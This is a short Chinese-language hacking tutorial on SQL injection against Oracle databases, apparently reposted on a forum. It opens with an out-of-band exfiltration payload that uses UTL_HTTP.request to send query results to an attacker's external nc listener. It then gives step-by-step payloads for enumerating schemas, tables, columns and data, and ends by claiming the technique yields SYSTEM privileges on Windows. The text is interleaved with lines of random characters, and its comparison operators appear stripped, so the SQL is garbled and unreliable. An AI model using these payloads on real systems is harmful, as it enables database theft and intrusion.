Oracle注射技术

会计考友

首先外网nc监听对应的端口
　　and UTL_HTTP.request("外网ip:port/"(sql语句))=1--
% j0 g% t+ p  c5 h. N　　爆库
  F# L* z/ H! L$ S' \$ N/ J# M+ W　　select owner from all_tables where rownum=1
　　select owner from all_tables where owner"第一个库名"
　　
! `6 }' F0 J+ |/ s5 U6 |　　and rownum=1
9 G, T3 }3 J( K& o$ U　　select owner from all_tables where owner"第一个库名"
　　and owner"第二个"and rownum=1
/ p6 f9 M* s6 }# A' K, t  f　　select owner from all_tables where owner"第一个库名"
( j7 h+ _& ]) P0 `; L& |0 C/ O　　and owner"第一个库名" and rownum=1
2 k6 j4 m; m: E0 |; c& L5 H  p　　以此论推
　　爆表
# M- Z: {8 l0 e" P# ^" K) Z　　select TABLE_NAME from all_tables where owner="库名"
　　and rownum=1
& g8 i5 P: `) U6 I' n& X( E8 L6 g　　select TABLE_NAME from all_tables where owner="库名"
5 u4 w* y4 E$ l8 e4 K8 y7 |　　and rownum=1 and TABLE_NAME"表名1"
4 c/ n' L: t' |% v　　select TABLE_NAME from all_tables where owner="库名"andrownum=1
　　and TABLE_NAME"表名1" and TABLE_NAME"表名2"
　　以此论推
* @5 @% B4 M& m) x3 Q6 j" I　　爆列
' _+ `' \7 G3 }& |) H　　select COLUMN_NAME from user_tab_columns wheretable_name="表名"
　　and rownum=1
　　select COLUMN_NAME from user_tab_columns wheretable_name="表名"
" l0 ]9 e# o8 k4 \# [/ s' T$ ]& [4 Y　　and rownum=1 and COLUMN_NAME"第一个爆出的列名"
　　select COLUMN_NAME from user_tab_columns wheretable_name="表名"
　　and rownum=1 and COLUMN_NAME"第一个爆出的列名"andCOLUMN_NAME"第二个爆出的列名"
; s  `7 R* D9 E0 n; _4 g　　爆内容
　　第一个内容：select 列名 from 表名 where rownum=1
9 R# S" r, c3 V7 w$ r) N　　第二个内容：select 列名 from 表名 where rownum=1 and 列名"第一个值"
　　第三个内容：select 列名 from 表名 where rownum=1 and 列名"第一个值"and列名"第二个值"
　　以此论推
1 U6 k4 v  p) z/ W2 t　　注
) P$ q8 N* B! w$ K2 b8 J' M0 b7 [　　1:在windows环境下，oracle是以服务的形式启动的，这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中，以供给大家更直观、简洁、有效的参考资料 　　2:针对unix和linux操作系统方面对于Oracle也会作出分析，相信Oracle注射将会成为转入高级Hack入侵的桥梁。